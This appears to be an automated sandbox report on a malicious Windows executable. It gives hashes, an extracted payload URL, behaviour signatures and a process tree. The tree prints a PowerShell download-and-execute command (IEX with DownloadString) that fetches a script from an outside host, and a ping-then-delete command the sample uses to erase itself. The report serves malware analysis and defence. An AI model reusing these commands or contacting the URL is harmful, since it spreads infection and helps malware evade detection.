Analysis
-
max time kernel
119s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
17-09-2023 02:43
Static task
static1
Behavioral task
behavioral1
Sample
c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exe
Resource
win10v2004-20230915-en
General
-
Target
c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exe
-
Size
247KB
-
MD5
f17afa21e88b7a362db5ae8fdfa43de9
-
SHA1
14b024dfe1f9aa6eb88bc7e2215e4877c92cc01e
-
SHA256
c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf
-
SHA512
efbdcd1c0fb91cb15de2935ed500fb0f9a8b3ef1491e9823850e97451348cd3a170bc0ad3c84086438508f7280f100a33ff8299a7de64093129b2d7ea83b8e0d
-
SSDEEP
3072:98iTSP3d1hp5xnAs03vx54qylRs8crPGjl5mS3qI79TPJvLCw8DSmfNKgAiNNrc4:90zl37r79h2DSm1SgAOmhzN+
Malware Config
Extracted
https://aszfiltration.com/storage/files/debug2.ps1
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 12 2928 powershell.exe 26 2928 powershell.exe -
Deletes itself 1 IoCs
Processes:
cmd.exepid process 2852 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2928 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2928 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.execmd.execmd.exedescription pid process target process PID 2932 wrote to memory of 2132 2932 c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exe cmd.exe PID 2932 wrote to memory of 2132 2932 c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exe cmd.exe PID 2932 wrote to memory of 2132 2932 c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exe cmd.exe PID 2932 wrote to memory of 2132 2932 c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exe cmd.exe PID 2132 wrote to memory of 2928 2132 cmd.exe powershell.exe PID 2132 wrote to memory of 2928 2132 cmd.exe powershell.exe PID 2132 wrote to memory of 2928 2132 cmd.exe powershell.exe PID 2932 wrote to memory of 2852 2932 c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exe cmd.exe PID 2932 wrote to memory of 2852 2932 c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exe cmd.exe PID 2932 wrote to memory of 2852 2932 c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exe cmd.exe PID 2932 wrote to memory of 2852 2932 c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exe cmd.exe PID 2852 wrote to memory of 1840 2852 cmd.exe PING.EXE PID 2852 wrote to memory of 1840 2852 cmd.exe PING.EXE PID 2852 wrote to memory of 1840 2852 cmd.exe PING.EXE PID 2852 wrote to memory of 1840 2852 cmd.exe PING.EXE
Processes
-
C:\Users\Admin\AppData\Local\Temp\c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exe"C:\Users\Admin\AppData\Local\Temp\c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://aszfiltration.com/storage/files/debug2.ps1')"2⤵
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command IEX(New-Object Net.Webclient).DownloadString('https://aszfiltration.com/storage/files/debug2.ps1')3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2928
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf.exe" >> NUL2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.13⤵
- Runs ping.exe
PID:1840
-
-